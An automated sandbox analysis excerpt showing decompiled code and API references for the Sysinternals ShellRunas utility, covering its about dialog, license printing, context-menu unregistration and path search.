                                                          0x00402c2d
                                                          0x00000000
                                                          0x00402c2d
                                                          0x00402b16
                                                          0x00402b1e
                                                          0x00402b20
                                                          0x00402b27
                                                          0x00402b29
                                                          0x00402b2b
                                                          0x00000000
                                                          0x00000000
                                                          0x00402b31
                                                          0x00402b37
                                                          0x00402b46
                                                          0x00402b48
                                                          0x00402b4a
                                                          0x00000000
                                                          0x00000000
                                                          0x00402b50
                                                          0x00402b54
                                                          0x00402b56
                                                          0x00402b5e
                                                          0x00402b60
                                                          0x00402b62
                                                          0x00000000
                                                          0x00000000
                                                          0x00402b68
                                                          0x00402b7b
                                                          0x00402b7d
                                                          0x00402b7f
                                                          0x00402c13
                                                          0x00402c13
                                                          0x00402c1f
                                                          0x00402c29
                                                          0x00402c2b
                                                          0x00402c2b
                                                          0x00000000
                                                          0x00402c2b
                                                          0x00402b85
                                                          0x00402b96
                                                          0x00402b98
                                                          0x00402b9a
                                                          0x00402bad
                                                          0x00402bad
                                                          0x00402bad
                                                          0x00402baf
                                                          0x00402baf
                                                          0x00402bb9
                                                          0x00402bbb
                                                          0x00402bbd
                                                          0x00000000
                                                          0x00000000
                                                          0x00402bbf
                                                          0x00402bc3
                                                          0x00402bca
                                                          0x00402bcb
                                                          0x00402bd3
                                                          0x00402bd4
                                                          0x00402bd5
                                                          0x00402bda
                                                          0x00402bdc
                                                          0x00402bec
                                                          0x00402bf0
                                                          0x00402bf1
                                                          0x00402bf9
                                                          0x00402bfa
                                                          0x00402c01
                                                          0x00402c02
                                                          0x00402c07
                                                          0x00402c0a
                                                          0x00402c0c
                                                          0x00402c0c
                                                          0x00000000
                                                          0x00402c0a
                                                          0x00402bde
                                                          0x00402be5
                                                          0x00402be5
                                                          0x00000000
                                                          0x00402bde
                                                          0x00402b9c
                                                          0x00402ba4
                                                          0x00000000
                                                          0x00000000
                                                          0x00402ba6
                                                          0x00000000
                                                          0x00402adc
                                                          0x00402adc
                                                          0x00000000
                                                          0x00402adc
                                                          0x00402a84
                                                          0x00402a84
                                                          0x00402a8c
                                                          0x00402a9f
                                                          0x00402a8e
                                                          0x00402a8e
                                                          0x00402a8e
                                                          0x00000000
                                                          0x00402a8c

                                                          APIs
                                                          • _memset.LIBCMT ref: 00402A1E
                                                          • _memset.LIBCMT ref: 00402A36
                                                          • SHGetMalloc.SHELL32(?), ref: 00402A43
                                                          • SHGetDesktopFolder.SHELL32(?,?,?,?), ref: 00402A58
                                                          • SearchPathW.KERNEL32(00000000,?,.exe,?,?,?,?,?,?), ref: 00402A7A
                                                          • GetLastError.KERNEL32(?,.exe,?,?,?,?,?,?), ref: 00402A84
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.492840110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_jsc.jbxd
                                                          Similarity
                                                          • API ID: _memset$DesktopErrorFolderLastMallocPathSearch
                                                          • String ID: .exe
                                                          • API String ID: 1184172398-4119554291
                                                          • Opcode ID: fb7a9b76fc0a125024f92bf21f90df84a81b0ed7226d44e92ef0621ef33c86bd
                                                          • Instruction ID: 348cd96654d2abbfe703da2164321630b7e188129bd778ae1d25fea451b48038
                                                          • Opcode Fuzzy Hash: fb7a9b76fc0a125024f92bf21f90df84a81b0ed7226d44e92ef0621ef33c86bd
                                                          • Instruction Fuzzy Hash: E981AD71508200AFD320EF58C988D6FB7E9AFC8704F144A6DF549E7290D6B8ED45CBA6
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E00407219() {
                                                          
                                                          				SetUnhandledExceptionFilter(E004071DC);
                                                          				return 0;
                                                          			}



                                                          0x0040721e
                                                          0x00407226

                                                          APIs
                                                          • SetUnhandledExceptionFilter.KERNEL32(Function_000071DC), ref: 0040721E
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.492840110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_jsc.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled
                                                          • String ID:
                                                          • API String ID: 3192549508-0
                                                          • Opcode ID: 60dce524007cd36b1afbdad1174eb971ab13da7a47c5473fb774a753f846e0e8
                                                          • Instruction ID: 4a2c546b5ce0fac6330c053a0bce39fcca3f6a47db525e6d2e0361f563a01c8d
                                                          • Opcode Fuzzy Hash: 60dce524007cd36b1afbdad1174eb971ab13da7a47c5473fb774a753f846e0e8
                                                          • Instruction Fuzzy Hash: 489002B0A651044EC6001FB05D0950535905A896127514871A401FC1D4EE7454449D6A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          C-Code - Quality: 69%
                                                          			E00401D50(void* __fp0, struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                          				signed int _v8;
                                                          				signed int _v28;
                                                          				signed int _v32;
                                                          				short _v552;
                                                          				struct tagLOGFONTW _v644;
                                                          				int _v652;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				void* __ebp;
                                                          				signed int _t21;
                                                          				int _t23;
                                                          				void* _t24;
                                                          				struct HWND__* _t27;
                                                          				int _t28;
                                                          				long _t30;
                                                          				void* _t42;
                                                          				struct HBRUSH__* _t44;
                                                          				void* _t47;
                                                          				void* _t49;
                                                          				void* _t50;
                                                          				int _t74;
                                                          				void* _t75;
                                                          				void* _t76;
                                                          				int _t77;
                                                          				void* _t79;
                                                          				struct HWND__* _t81;
                                                          				void* _t92;
                                                          				struct HWND__* _t101;
                                                          				void* _t102;
                                                          				void* _t103;
                                                          				void* _t104;
                                                          				long _t106;
                                                          				void* _t107;
                                                          				void* _t109;
                                                          				void* _t112;
                                                          				signed int _t113;
                                                          				void* _t119;
                                                          
                                                          				_t115 = (_t113 & 0xfffffff8) - 0x274;
                                                          				_t21 =  *0x413004; // 0xf284055d
                                                          				_v8 = _t21 ^ (_t113 & 0xfffffff8) - 0x00000274;
                                                          				_t23 = _a8;
                                                          				_t119 = _t23 - 0x138;
                                                          				_t74 = _a12;
                                                          				_t106 = _a16;
                                                          				_t101 = _a4;
                                                          				if(_t119 > 0) {
                                                          					_t24 = _t23 - 0x200;
                                                          					if(_t24 == 0) {
                                                          						_push(_t106 >> 0x10);
                                                          						_t27 = ChildWindowFromPoint(_t101, _t106 & 0x0000ffff);
                                                          						_t81 =  *0x414aa4;
                                                          						_t28 =  *0x414aa8;
                                                          						if(_t28 == (0 | _t27 == _t81)) {
                                                          							 *0x414aa8 = 0 | _t28 == 0x00000000;
                                                          							InvalidateRect(_t81, 0, 0);
                                                          							_t28 =  *0x414aa8;
                                                          						}
                                                          						if(_t28 == 0) {
                                                          							SetCursor( *0x414a9c);
                                                          						} else {
                                                          							SetCursor( *0x414aa0);
                                                          						}
                                                          					} else {
                                                          						if(_t24 == 2) {
                                                          							_push(_t106 >> 0x10);
                                                          							if(ChildWindowFromPoint(_t101, _t106 & 0x0000ffff) ==  *0x414aa4) {
                                                          								ShellExecuteW(_t101, L"open", L"http://www.sysinternals.com", 0, 0, 1);
                                                          							}
                                                          						}
                                                          					}
                                                          					goto L25;
                                                          				} else {
                                                          					if(_t119 == 0) {
                                                          						if(_t106 !=  *0x414aa4) {
                                                          							goto L25;
                                                          						} else {
                                                          							SetBkMode(_t74, 1);
                                                          							if(GetSysColorBrush(0x1a) == 0) {
                                                          								_push(0xff0000);
                                                          							} else {
                                                          								_push(GetSysColor(0x1a));
                                                          							}
                                                          							SetTextColor(_t74, ??);
                                                          							_t42 =  *0x414a98;
                                                          							if( *0x414aa8 == 0) {
                                                          								_t42 =  *0x414a94;
                                                          							}
                                                          							SelectObject(_t74, _t42);
                                                          							_t44 = GetSysColorBrush(0xf);
                                                          							_pop(_t103);
                                                          							_pop(_t109);
                                                          							_pop(_t76);
                                                          							return E0040318A(_t44, _t76, _v32 ^ _t115, _t92, _t103, _t109);
                                                          						}
                                                          					} else {
                                                          						_t47 = _t23 - 0x10;
                                                          						if(_t47 == 0) {
                                                          							L6:
                                                          							EndDialog(_t101, 0);
                                                          							PostQuitMessage(0);
                                                          							goto L25;
                                                          						} else {
                                                          							_t49 = _t47 - 0x100;
                                                          							if(_t49 == 0) {
                                                          								_t50 = GetStockObject(0x11);
                                                          								 *0x414a94 = _t50;
                                                          								GetObjectW(_t50, 0x5c,  &(_v644.lfOrientation));
                                                          								_v644.lfUnderline = 1;
                                                          								 *0x414a98 = CreateFontIndirectW( &_v644);
                                                          								 *0x414aa8 = 1;
                                                          								 *0x414aa4 = GetDlgItem(_t101, 0x40a);
                                                          								GetModuleFileNameW(0,  &_v552, 0x208);
                                                          								_t77 = GetFileVersionInfoSizeW( &_v552,  &_v652);
                                                          								GetFileVersionInfoW( &_v552, 0, _t77, E0040354A(_t77));
                                                          								SetDlgItemTextW(_t101, 0x46c, E00401D00(_t57, L"FileVersion"));
                                                          								SetDlgItemTextW(_t101, 0x46b, E00401D00(_t57, L"LegalCopyright"));
                                                          								 *0x414a9c = LoadCursorW(GetModuleHandleW(0), L"HAND");
                                                          								 *0x414aa0 = LoadCursorW(0, 0x7f00);
                                                          								ShowWindow(_t101, 5);
                                                          								_pop(_t104);
                                                          								_pop(_t112);
                                                          								_pop(_t79);
                                                          								return E0040318A(1, _t79, _v28 ^ _t115 + 0xc,  &_v552, _t104, _t112);
                                                          							} else {
                                                          								if(_t49 == 1 && (_t74 & 0x0000ffff) + 0xffffffff <= 1) {
                                                          									goto L6;
                                                          								}
                                                          								L25:
                                                          								_t30 = DefWindowProcW(_t101, _a8, _t74, _t106);
                                                          								_pop(_t102);
                                                          								_pop(_t107);
                                                          								_pop(_t75);
                                                          								return E0040318A(_t30, _t75, _v8 ^ _t115, _a8, _t102, _t107);
                                                          							}
                                                          						}
                                                          					}
                                                          				}
                                                          			}









































                                                          0x00401d56
                                                          0x00401d5c
                                                          0x00401d63
                                                          0x00401d6a
                                                          0x00401d6d
                                                          0x00401d73
                                                          0x00401d77
                                                          0x00401d7b
                                                          0x00401d7e
                                                          0x00401f3b
                                                          0x00401f40
                                                          0x00401f85
                                                          0x00401f88
                                                          0x00401f8e
                                                          0x00401f98
                                                          0x00401fa2
                                                          0x00401fb0
                                                          0x00401fb6
                                                          0x00401fbc
                                                          0x00401fbc
                                                          0x00401fc3
                                                          0x00401fd4
                                                          0x00401fc5
                                                          0x00401fd4
                                                          0x00401fd4
                                                          0x00401f42
                                                          0x00401f45
                                                          0x00401f53
                                                          0x00401f62
                                                          0x00401f75
                                                          0x00401f75
                                                          0x00401f62
                                                          0x00401f45
                                                          0x00000000
                                                          0x00401d84
                                                          0x00401d84
                                                          0x00401ed1
                                                          0x00000000
                                                          0x00401ed7
                                                          0x00401eda
                                                          0x00401eec
                                                          0x00401ef9
                                                          0x00401eee
                                                          0x00401ef6
                                                          0x00401ef6
                                                          0x00401eff
                                                          0x00401f0c
                                                          0x00401f11
                                                          0x00401f13
                                                          0x00401f13
                                                          0x00401f1a
                                                          0x00401f22
                                                          0x00401f24
                                                          0x00401f25
                                                          0x00401f26
                                                          0x00401f38
                                                          0x00401f38
                                                          0x00401d8a
                                                          0x00401d8a
                                                          0x00401d8d
                                                          0x00401dae
                                                          0x00401db1
                                                          0x00401db9
                                                          0x00000000
                                                          0x00401d8f
                                                          0x00401d8f
                                                          0x00401d94
                                                          0x00401dc6
                                                          0x00401dd4
                                                          0x00401dd9
                                                          0x00401de4
                                                          0x00401df5
                                                          0x00401dfa
                                                          0x00401e0a
                                                          0x00401e1b
                                                          0x00401e30
                                                          0x00401e46
                                                          0x00401e65
                                                          0x00401e7b
                                                          0x00401e9a
                                                          0x00401ea4
                                                          0x00401ea9
                                                          0x00401eb4
                                                          0x00401eb5
                                                          0x00401eb6
                                                          0x00401ec8
                                                          0x00401d96
                                                          0x00401d99
                                                          0x00000000
                                                          0x00000000
                                                          0x00401fda
                                                          0x00401fe1
                                                          0x00401fee
                                                          0x00401fef
                                                          0x00401ff0
                                                          0x00401ffb
                                                          0x00401ffb
                                                          0x00401d94
                                                          0x00401d8d
                                                          0x00401d84

                                                          APIs
                                                          • EndDialog.USER32(?,00000000), ref: 00401DB1
                                                          • PostQuitMessage.USER32(00000000), ref: 00401DB9
                                                          • GetStockObject.GDI32(00000011), ref: 00401DC6
                                                          • GetObjectW.GDI32(00000000,0000005C,?), ref: 00401DD9
                                                          • CreateFontIndirectW.GDI32 ref: 00401DE9
                                                          • GetDlgItem.USER32 ref: 00401E04
                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,?,?,?), ref: 00401E1B
                                                          • GetFileVersionInfoSizeW.VERSION(?,?,?,?,?,?,?,?,?,?), ref: 00401E2B
                                                          • _malloc.LIBCMT ref: 00401E33
                                                          • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000), ref: 00401E46
                                                          • SetDlgItemTextW.USER32 ref: 00401E65
                                                          • SetDlgItemTextW.USER32 ref: 00401E7B
                                                          • GetModuleHandleW.KERNEL32(00000000,HAND), ref: 00401E84
                                                          • LoadCursorW.USER32(00000000), ref: 00401E91
                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 00401E9F
                                                          • ShowWindow.USER32(?,00000005), ref: 00401EA9
                                                          • SetBkMode.GDI32(?,00000001), ref: 00401EDA
                                                          • GetSysColorBrush.USER32(0000001A), ref: 00401EE8
                                                          • GetSysColor.USER32(0000001A), ref: 00401EF0
                                                          • SetTextColor.GDI32(?,00FF0000), ref: 00401EFF
                                                          • SelectObject.GDI32(?,?), ref: 00401F1A
                                                          • GetSysColorBrush.USER32(0000000F), ref: 00401F22
                                                          • ChildWindowFromPoint.USER32 ref: 00401F56
                                                          • ShellExecuteW.SHELL32(?,open,http://www.sysinternals.com,00000000,00000000,00000001), ref: 00401F75
                                                          • ChildWindowFromPoint.USER32 ref: 00401F88
                                                          • InvalidateRect.USER32(?,00000000,00000000,?,?), ref: 00401FB6
                                                          • SetCursor.USER32(?,?,?), ref: 00401FD4
                                                          • DefWindowProcW.USER32(?,?,?,?,?,?), ref: 00401FE1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.492840110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_jsc.jbxd
                                                          Similarity
                                                          • API ID: ColorWindow$CursorFileItemObjectText$BrushChildFromInfoLoadModulePointVersion$CreateDialogExecuteFontHandleIndirectInvalidateMessageModeNamePostProcQuitRectSelectShellShowSizeStock_malloc
                                                          • String ID: FileVersion$HAND$LegalCopyright$http://www.sysinternals.com$open
                                                          • API String ID: 3345172160-4191033705
                                                          • Opcode ID: 2f602c52077be3eec7b50e33d563c06f28bb8856962e059969dcbe1c2fda3ebc
                                                          • Instruction ID: e26033b52e4dbe09ff1a83e59bdc46354e0d09b5a075afc51df58c3e83d68215
                                                          • Opcode Fuzzy Hash: 2f602c52077be3eec7b50e33d563c06f28bb8856962e059969dcbe1c2fda3ebc
                                                          • Instruction Fuzzy Hash: FC61D771640201AFE7109FA5ED89FBB37A8EF88741F11853AF509F61E1CB7898058B6D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 305 401930-4019cd RegDeleteKeyW * 12 306 4019e3-4019e5 305->306 307 4019cf-4019dd MessageBoxW 305->307 307->306
                                                          C-Code - Quality: 100%
                                                          			E00401930(char _a4) {
                                                          
                                                          				RegDeleteKeyW(0x80000001, L"Software\\Classes\\SystemFileAssociations\\.exe\\Shell\\Run as different user...\\Command");
                                                          				RegDeleteKeyW(0x80000001, L"Software\\Classes\\SystemFileAssociations\\.exe\\Shell\\Run as different user...");
                                                          				RegDeleteKeyW(0x80000001, L"Software\\Classes\\SystemFileAssociations\\.exe\\Shell\\Run as different user (netonly)...\\Command");
                                                          				RegDeleteKeyW(0x80000001, L"Software\\Classes\\SystemFileAssociations\\.exe\\Shell\\Run as different user (netonly)...");
                                                          				RegDeleteKeyW(0x80000001, L"Software\\Classes\\lnkfile\\Shell\\Run as different user...\\Command");
                                                          				RegDeleteKeyW(0x80000001, L"Software\\Classes\\lnkfile\\Shell\\Run as different user...");
                                                          				RegDeleteKeyW(0x80000001, L"Software\\Classes\\lnkfile\\Shell\\Run as different user (netonly)...\\Command");
                                                          				RegDeleteKeyW(0x80000001, L"Software\\Classes\\lnkfile\\Shell\\Run as different user (netonly)...");
                                                          				RegDeleteKeyW(0x80000001, L"Software\\Classes\\SystemFileAssociations\\.msc\\Shell\\Run as different user...\\Command");
                                                          				RegDeleteKeyW(0x80000001, L"Software\\Classes\\SystemFileAssociations\\.msc\\Shell\\Run as different user...");
                                                          				RegDeleteKeyW(0x80000001, L"Software\\Classes\\SystemFileAssociations\\.msc\\Shell\\Run as different user (netonly)...\\Command");
                                                          				RegDeleteKeyW(0x80000001, L"Software\\Classes\\SystemFileAssociations\\.msc\\Shell\\Run as different user (netonly)...");
                                                          				if(_a4 != 0) {
                                                          					MessageBoxW(0, L"ShellRunas context menu handler unregistered.", L"ShellRunas - Sysinternals: www.sysinternals.com", 0x40);
                                                          				}
                                                          				return 0;
                                                          			}



                                                          0x00401941
                                                          0x0040194d
                                                          0x00401959
                                                          0x00401965
                                                          0x00401971
                                                          0x0040197d
                                                          0x00401989
                                                          0x00401995
                                                          0x004019a1
                                                          0x004019ad
                                                          0x004019b9
                                                          0x004019c5
                                                          0x004019cd
                                                          0x004019dd
                                                          0x004019dd
                                                          0x004019e5

                                                          APIs
                                                          • RegDeleteKeyW.ADVAPI32(80000001,Software\Classes\SystemFileAssociations\.exe\Shell\Run as different user...\Command), ref: 00401941
                                                          • RegDeleteKeyW.ADVAPI32(80000001,Software\Classes\SystemFileAssociations\.exe\Shell\Run as different user...), ref: 0040194D
                                                          • RegDeleteKeyW.ADVAPI32(80000001,Software\Classes\SystemFileAssociations\.exe\Shell\Run as different user (netonly)...\Command), ref: 00401959
                                                          • RegDeleteKeyW.ADVAPI32(80000001,Software\Classes\SystemFileAssociations\.exe\Shell\Run as different user (netonly)...), ref: 00401965
                                                          • RegDeleteKeyW.ADVAPI32(80000001,Software\Classes\lnkfile\Shell\Run as different user...\Command), ref: 00401971
                                                          • RegDeleteKeyW.ADVAPI32(80000001,Software\Classes\lnkfile\Shell\Run as different user...), ref: 0040197D
                                                          • RegDeleteKeyW.ADVAPI32(80000001,Software\Classes\lnkfile\Shell\Run as different user (netonly)...\Command), ref: 00401989
                                                          • RegDeleteKeyW.ADVAPI32(80000001,Software\Classes\lnkfile\Shell\Run as different user (netonly)...), ref: 00401995
                                                          • RegDeleteKeyW.ADVAPI32(80000001,Software\Classes\SystemFileAssociations\.msc\Shell\Run as different user...\Command), ref: 004019A1
                                                          • RegDeleteKeyW.ADVAPI32(80000001,Software\Classes\SystemFileAssociations\.msc\Shell\Run as different user...), ref: 004019AD
                                                          • RegDeleteKeyW.ADVAPI32(80000001,Software\Classes\SystemFileAssociations\.msc\Shell\Run as different user (netonly)...\Command), ref: 004019B9
                                                          • RegDeleteKeyW.ADVAPI32(80000001,Software\Classes\SystemFileAssociations\.msc\Shell\Run as different user (netonly)...), ref: 004019C5
                                                          • MessageBoxW.USER32(00000000,ShellRunas context menu handler unregistered.,ShellRunas - Sysinternals: www.sysinternals.com,00000040), ref: 004019DD
                                                          Strings
                                                          • Software\Classes\SystemFileAssociations\.msc\Shell\Run as different user...\Command, xrefs: 00401997
                                                          • Software\Classes\lnkfile\Shell\Run as different user (netonly)...\Command, xrefs: 0040197F
                                                          • ShellRunas - Sysinternals: www.sysinternals.com, xrefs: 004019D1
                                                          • Software\Classes\lnkfile\Shell\Run as different user..., xrefs: 00401973
                                                          • Software\Classes\SystemFileAssociations\.exe\Shell\Run as different user (netonly)..., xrefs: 0040195B
                                                          • Software\Classes\lnkfile\Shell\Run as different user...\Command, xrefs: 00401967
                                                          • Software\Classes\SystemFileAssociations\.exe\Shell\Run as different user..., xrefs: 00401943
                                                          • ShellRunas context menu handler unregistered., xrefs: 004019D6
                                                          • Software\Classes\SystemFileAssociations\.msc\Shell\Run as different user (netonly)..., xrefs: 004019BB
                                                          • Software\Classes\SystemFileAssociations\.msc\Shell\Run as different user..., xrefs: 004019A3
                                                          • Software\Classes\SystemFileAssociations\.exe\Shell\Run as different user...\Command, xrefs: 00401937
                                                          • Software\Classes\SystemFileAssociations\.msc\Shell\Run as different user (netonly)...\Command, xrefs: 004019AF
                                                          • Software\Classes\SystemFileAssociations\.exe\Shell\Run as different user (netonly)...\Command, xrefs: 0040194F
                                                          • Software\Classes\lnkfile\Shell\Run as different user (netonly)..., xrefs: 0040198B
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.492840110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_jsc.jbxd
                                                          Similarity
                                                          • API ID: Delete$Message
                                                          • String ID: ShellRunas - Sysinternals: www.sysinternals.com$ShellRunas context menu handler unregistered.$Software\Classes\SystemFileAssociations\.exe\Shell\Run as different user (netonly)...$Software\Classes\SystemFileAssociations\.exe\Shell\Run as different user (netonly)...\Command$Software\Classes\SystemFileAssociations\.exe\Shell\Run as different user...$Software\Classes\SystemFileAssociations\.exe\Shell\Run as different user...\Command$Software\Classes\SystemFileAssociations\.msc\Shell\Run as different user (netonly)...$Software\Classes\SystemFileAssociations\.msc\Shell\Run as different user (netonly)...\Command$Software\Classes\SystemFileAssociations\.msc\Shell\Run as different user...$Software\Classes\SystemFileAssociations\.msc\Shell\Run as different user...\Command$Software\Classes\lnkfile\Shell\Run as different user (netonly)...$Software\Classes\lnkfile\Shell\Run as different user (netonly)...\Command$Software\Classes\lnkfile\Shell\Run as different user...$Software\Classes\lnkfile\Shell\Run as different user...\Command
                                                          • API String ID: 3870238891-4209861522
                                                          • Opcode ID: 740cf35f253191141593886196fbd27c721ca799f3015d695be5faa3ca5f58ce
                                                          • Instruction ID: 5da64dfe4fce38312f7ee7f6f0bbc387e0a5c92d836bb648faa7c577a003e90f
                                                          • Opcode Fuzzy Hash: 740cf35f253191141593886196fbd27c721ca799f3015d695be5faa3ca5f58ce
                                                          • Instruction Fuzzy Hash: EFF03F70AD5328B9E26023E25D0BFDA7D40CB24BA6F30011B7B4C3509249EA21E5C9EE
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          C-Code - Quality: 95%
                                                          			E00401000(struct HWND__* __edi, void* __eflags) {
                                                          				struct HINSTANCE__* _v42;
                                                          				intOrPtr _v56;
                                                          				struct HDC__* _v60;
                                                          				struct HDC__* _v68;
                                                          				struct HWND__* _v72;
                                                          				struct tagPD _v76;
                                                          				struct HDC__* _v84;
                                                          				struct HDC__* _v92;
                                                          				struct HDC__* _v100;
                                                          				struct HDC__* _v108;
                                                          				struct HDC__* _v112;
                                                          				struct HDC__* _v116;
                                                          				struct _DOCINFOW _v136;
                                                          				intOrPtr _v140;
                                                          				int _v144;
                                                          				signed int _v148;
                                                          				struct HICON__* _v152;
                                                          				long _v156;
                                                          				long _v160;
                                                          				struct tagRECT _v176;
                                                          				intOrPtr _v180;
                                                          				intOrPtr _v184;
                                                          				signed int _v188;
                                                          				void* _v196;
                                                          				void* _v204;
                                                          				struct HICON__* _v212;
                                                          				intOrPtr _v220;
                                                          				int _t69;
                                                          				signed int _t72;
                                                          				signed int _t76;
                                                          				struct HDC__* _t81;
                                                          				signed int _t87;
                                                          				signed int _t114;
                                                          				struct HWND__* _t128;
                                                          				long _t132;
                                                          
                                                          				_t128 = __edi;
                                                          				E00409280(__edi,  &_v72, 0, 0x3e);
                                                          				_v76 = 0x42;
                                                          				_v72 = _t128;
                                                          				_v42 = GetModuleHandleW(0);
                                                          				_v56 = 0x14c;
                                                          				_t69 = PrintDlgW( &_v76);
                                                          				if(_t69 != 0) {
                                                          					_v152 = SetCursor(LoadCursorW(0, 0x7f02));
                                                          					_t72 = GetDeviceCaps(_v60, 8);
                                                          					_v176.top = GetDeviceCaps(_v68, 0xa);
                                                          					_v176.top = GetDeviceCaps(_v76, 0x58);
                                                          					_t76 = GetDeviceCaps(_v84, 0x5a);
                                                          					_v176.left = 0;
                                                          					E00409280(_t128,  &(_v176.top), 0, 0x2c);
                                                          					_v136.lpszOutput = 0;
                                                          					_v136.lpszDatatype = 0;
                                                          					_v136.fwType = 0;
                                                          					_v116 = 0;
                                                          					_v112 = 0;
                                                          					SetMapMode(_v92, 1);
                                                          					_t81 = _v100;
                                                          					_v184 = _t81;
                                                          					_v180 = _t81;
                                                          					_v156 = 0;
                                                          					_v160 = 0;
                                                          					asm("cdq");
                                                          					_t114 = _v196 / _t76 * 0x5a0;
                                                          					asm("cdq");
                                                          					_v176.left = _v160;
                                                          					_v148 = _t114;
                                                          					_v176.top = _v156;
                                                          					_v176.bottom = _t114;
                                                          					_t87 = _t72 / _v188 * 0x5a0;
                                                          					_v152 = _t87;
                                                          					_v176.right = _t87;
                                                          					InflateRect( &_v176, 0xfffffa60, 0xfffffa60);
                                                          					_v144 = 0;
                                                          					_v140 = 0xffffffff;
                                                          					_v136.cbSize = 0x14;
                                                          					_v136.lpszDocName = L"Sysinternals License";
                                                          					StartDocW(_v100,  &_v136);
                                                          					_v204 = SendMessageW(_t128, 0xe, 0, 0);
                                                          					StartPage(_v108);
                                                          					_t132 = SendMessageW(_t128, 0x439, 1,  &_v196);
                                                          					EndPage(_v112);
                                                          					if(_t132 < _v212) {
                                                          						do {
                                                          							_v160 = _t132;
                                                          							_v156 = 0xffffffff;
                                                          							StartPage(_v116);
                                                          							_t132 = SendMessageW(_t128, 0x439, 1,  &_v204);
                                                          							EndPage(_v136.fwType);
                                                          						} while (_t132 < _v220);
                                                          					}
                                                          					SendMessageW(_t128, 0x439, 0, 0);
                                                          					EndDoc(_v116);
                                                          					SetCursor(_v212);
                                                          					return 1;
                                                          				} else {
                                                          					return _t69;
                                                          				}
                                                          			}






































                                                          0x00401000
                                                          0x00401017
                                                          0x00401021
                                                          0x00401029
                                                          0x00401038
                                                          0x0040103c
                                                          0x00401044
                                                          0x0040104c
                                                          0x00401075
                                                          0x00401079
                                                          0x0040108d
                                                          0x0040109a
                                                          0x0040109e
                                                          0x004010ab
                                                          0x004010b3
                                                          0x004010c4
                                                          0x004010c8
                                                          0x004010cc
                                                          0x004010d0
                                                          0x004010d4
                                                          0x004010d8
                                                          0x004010de
                                                          0x004010e2
                                                          0x004010e6
                                                          0x004010ec
                                                          0x004010f0
                                                          0x004010f8
                                                          0x00401109
                                                          0x0040110f
                                                          0x00401118
                                                          0x00401120
                                                          0x00401124
                                                          0x00401128
                                                          0x0040112c
                                                          0x00401132
                                                          0x00401136
                                                          0x0040113f
                                                          0x0040114f
                                                          0x00401157
                                                          0x0040115f
                                                          0x00401167
                                                          0x0040116f
                                                          0x00401184
                                                          0x0040118d
                                                          0x004011a7
                                                          0x004011a9
                                                          0x004011b3
                                                          0x004011b5
                                                          0x004011ba
                                                          0x004011be
                                                          0x004011c6
                                                          0x004011e0
                                                          0x004011e2
                                                          0x004011e8
                                                          0x004011b5
                                                          0x004011f8
                                                          0x004011ff
                                                          0x0040120a
                                                          0x0040121a
                                                          0x0040104e
                                                          0x00401053
                                                          0x00401053

                                                          APIs
                                                          • _memset.LIBCMT ref: 00401017
                                                          • GetModuleHandleW.KERNEL32 ref: 0040102D
                                                          • PrintDlgW.COMDLG32(?,?,?,?,?), ref: 00401044
                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 0040105B
                                                          • SetCursor.USER32(00000000,?,?,?,?,?), ref: 00401062
                                                          • GetDeviceCaps.GDI32(?,00000008), ref: 00401079
                                                          • GetDeviceCaps.GDI32(?,0000000A), ref: 00401084
                                                          • GetDeviceCaps.GDI32(?,00000058), ref: 00401091
                                                          • GetDeviceCaps.GDI32(?,0000005A), ref: 0040109E
                                                          • _memset.LIBCMT ref: 004010B3
                                                          • SetMapMode.GDI32(?,00000001), ref: 004010D8
                                                          • InflateRect.USER32(?,?,FFFFFA60), ref: 0040113F
                                                          • StartDocW.GDI32 ref: 0040116F
                                                          • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00401182
                                                          • StartPage.GDI32(?), ref: 0040118D
                                                          • SendMessageW.USER32(?,00000439,00000001,?), ref: 004011A0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.492840110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_jsc.jbxd
                                                          Similarity
                                                          • API ID: CapsDevice$CursorMessageSendStart_memset$HandleInflateLoadModeModulePagePrintRect
                                                          • String ID: B$Sysinternals License
                                                          • API String ID: 2038973732-3449285610
                                                          • Opcode ID: 50c78a9c205daa766ea62d1cb0deeee4e7ab09cc65df2377fcb9ff908164596a
                                                          • Instruction ID: bdae98e849ea38a2b48d3d89d57636c7b0b180fdbc1935bf1a89306988cad38c
                                                          • Opcode Fuzzy Hash: 50c78a9c205daa766ea62d1cb0deeee4e7ab09cc65df2377fcb9ff908164596a
                                                          • Instruction Fuzzy Hash: 16512EB1A48300AFD310DFA9DD45B5BBBE4BB88714F004A2DF689E72A0D774D845CB96
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
